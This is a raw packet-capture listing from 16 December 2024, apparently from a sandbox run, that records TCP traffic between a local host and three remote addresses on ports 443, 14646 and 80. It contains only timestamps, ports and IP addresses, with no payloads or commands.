                                                                                                                Dec 16, 2024 07:12:33.101144075 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.101197958 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.106702089 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.106720924 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.106822968 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.106822968 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.106856108 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.106898069 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.255916119 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.255976915 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.256123066 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.256185055 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.256230116 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.256253004 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.261584997 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.261630058 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.261761904 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.261763096 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.261826992 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.261892080 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.268008947 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.268052101 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.268167019 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.268167019 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.268230915 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.268290043 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.274441004 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.274481058 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.274646044 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.274646044 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.274709940 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.274797916 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.280548096 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.280590057 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.280729055 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.280729055 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.280793905 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.280848026 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.287017107 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.287060022 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.287097931 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.287166119 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.287206888 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.287252903 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.292866945 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.292908907 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.293064117 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.293082952 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.293209076 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.299290895 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.299352884 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.299412012 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.299503088 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.299555063 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.299577951 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.448122978 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.448183060 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.448242903 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.448311090 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.448348045 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.448371887 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.454581976 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.454628944 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.454693079 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.454725027 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.454752922 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.454776049 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.460536003 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.460583925 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.460701942 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.460769892 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.460813046 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.460855961 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.461990118 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.462057114 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.462085009 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.462146044 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.462162971 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.462235928 CET44349738172.67.187.200192.168.2.4
                                                                                                                Dec 16, 2024 07:12:33.462296963 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.463061094 CET49738443192.168.2.4172.67.187.200
                                                                                                                Dec 16, 2024 07:12:33.904653072 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:34.024658918 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:34.024750948 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:34.032825947 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:34.152585030 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:35.145096064 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:35.200212955 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:35.378748894 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:35.383018970 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:35.502839088 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:35.502913952 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:35.622896910 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:35.837426901 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:35.845874071 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:35.965984106 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:36.029628038 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:36.037569046 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:36.075088024 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:36.157802105 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:36.158085108 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:36.160969973 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:36.226522923 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:12:36.281080961 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:36.346669912 CET8049741178.237.33.50192.168.2.4
                                                                                                                Dec 16, 2024 07:12:36.346759081 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:12:36.346940041 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:12:36.467020988 CET8049741178.237.33.50192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.157491922 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.158715963 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.268243074 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.278862000 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.309488058 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.502615929 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.511837006 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.593066931 CET8049741178.237.33.50192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.593143940 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:12:37.604638100 CET4973914646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.631975889 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.632208109 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.724869013 CET1464649739107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.752412081 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975497961 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975583076 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975635052 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975650072 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.975670099 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975703001 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975712061 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.975737095 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975771904 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975780010 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.975806952 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975840092 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.975852013 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.983794928 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.984013081 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.984057903 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:37.992222071 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:37.992341995 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.095777988 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.167582035 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.167643070 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.167655945 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.171432972 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.171489954 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.171591043 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.179414034 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.179462910 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.179482937 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.187401056 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.187457085 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.187514067 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.195377111 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.195426941 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.195503950 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.203340054 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.203387022 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.203433990 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.211343050 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.211395025 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.211405039 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.219351053 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.219405890 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.219511986 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.227309942 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.227370977 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.227427006 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.235343933 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.235394955 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.235445023 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.243304968 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.243350983 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.243427992 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.287494898 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.287553072 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.287623882 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.359488964 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.359616041 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.359626055 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.363298893 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.363357067 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.363418102 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.371310949 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.371403933 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.371516943 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.379308939 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.379368067 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.379578114 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.387290955 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.387367964 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.387465954 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.395258904 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.395374060 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.395472050 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.403234005 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.403295040 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.403379917 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.411212921 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.411305904 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.411354065 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.419219971 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.419274092 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.419367075 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.427212954 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.427265882 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.427357912 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.431097984 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.431166887 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.431197882 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.434861898 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.434922934 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.434997082 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.438699961 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.438766003 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.438800097 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.442507982 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.442564011 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.442584038 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.446345091 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.446448088 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.446460962 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.450129032 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.450180054 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.450232983 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.453948975 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.454005957 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.454076052 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.457912922 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.458003998 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.458071947 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.461586952 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.461772919 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.461807966 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.551366091 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.551431894 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.551464081 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.553098917 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.553411007 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.553833008 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.553944111 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.553988934 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.557661057 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.557863951 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.557905912 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.561455011 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.561671972 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.561726093 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.565383911 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.565427065 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.565623045 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.569089890 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.569319963 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.569395065 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.572945118 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.573036909 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.573149920 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.576734066 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.576867104 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.576984882 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.580461025 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.580650091 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.580703020 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.584028006 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.584265947 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.584367037 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.587420940 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.587672949 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.587722063 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.590657949 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.590857029 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.590922117 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.593858004 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.594069004 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.594302893 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.597083092 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.597203016 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.597316027 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.600328922 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.600382090 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.600557089 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.602833986 CET8049741178.237.33.50192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.602889061 CET4974180192.168.2.4178.237.33.50
                                                                                                                Dec 16, 2024 07:12:38.603487015 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.603605986 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.603739977 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.606698036 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.606919050 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.606960058 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.609899044 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.610210896 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.610826015 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.613109112 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.613254070 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.614165068 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.616308928 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.616427898 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.616477966 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.619520903 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.619635105 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.619677067 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.622735023 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.622986078 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.623037100 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.625961065 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.626218081 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.626264095 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.629262924 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.629415035 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.629467964 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.632410049 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.632637978 CET1464649740107.173.143.31192.168.2.4
                                                                                                                Dec 16, 2024 07:12:38.632693052 CET4974014646192.168.2.4107.173.143.31
                                                                                                                Dec 16, 2024 07:12:38.635584116 CET1464649740107.173.143.31192.168.2.4
